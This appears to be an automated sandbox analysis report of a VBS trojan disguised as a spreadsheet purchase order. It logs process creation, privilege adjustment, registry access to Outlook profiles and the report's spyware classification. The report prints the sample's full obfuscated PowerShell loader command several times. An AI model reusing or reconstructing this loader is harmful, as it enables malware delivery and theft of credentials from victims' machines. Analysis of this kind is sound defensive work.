Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1CFDAAB6 AdjustTokenPrivileges, 11_2_1CFDAAB6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1CFDAA7F AdjustTokenPrivileges, 11_2_1CFDAA7F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azl1colp.uti.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@13/10@2/2
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:304:WilStaging_02
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: Binary string: $Pl8C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.pdb source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: Yara match File source: 00000005.00000002.2688111783.0000000009190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.2410724852.0000000000B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0287B5B0 push es; ret 5_2_0287B5C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07BE7581 push es; ret 5_2_07BE7590
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C48FC1 push ds; ret 5_2_07C48FC2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4C7A0 push DC07C33Fh; ret 5_2_07C4C7A5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F718 pushad ; ret 5_2_07C4F71A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E719 push ebx; ret 5_2_07C4E71A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F71B pushad ; ret 5_2_07C4F722
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F6C1 pushad ; ret 5_2_07C4F6C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F687 pushad ; ret 5_2_07C4F68A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E6B8 push ebx; ret 5_2_07C4E6BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E6BB push ebx; ret 5_2_07C4E6C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F648 pushad ; ret 5_2_07C4F64A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F5F1 pushad ; ret 5_2_07C4F5F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F5B1 pushad ; ret 5_2_07C4F5B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F5B3 pushad ; ret 5_2_07C4F5BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F570 pushad ; ret 5_2_07C4F572
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F573 pushad ; ret 5_2_07C4F57A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E510 push edx; ret 5_2_07C4E512
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F530 pushad ; ret 5_2_07C4F532
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F533 pushad ; ret 5_2_07C4F53A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E4D0 push edx; ret 5_2_07C4E4D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E4D3 push edx; ret 5_2_07C4E4DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E4F0 push edx; ret 5_2_07C4E4F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E4F3 push edx; ret 5_2_07C4E4FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4F491 pushad ; ret 5_2_07C4F492
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E451 push edx; ret 5_2_07C4E452
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E453 push edx; ret 5_2_07C4E45A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C48468 push ss; ret 5_2_07C4846A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C48348 push ss; ret 5_2_07C48472
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E333 push ecx; ret 5_2_07C4E336
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C4E299 push ecx; ret 5_2_07C4E29A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
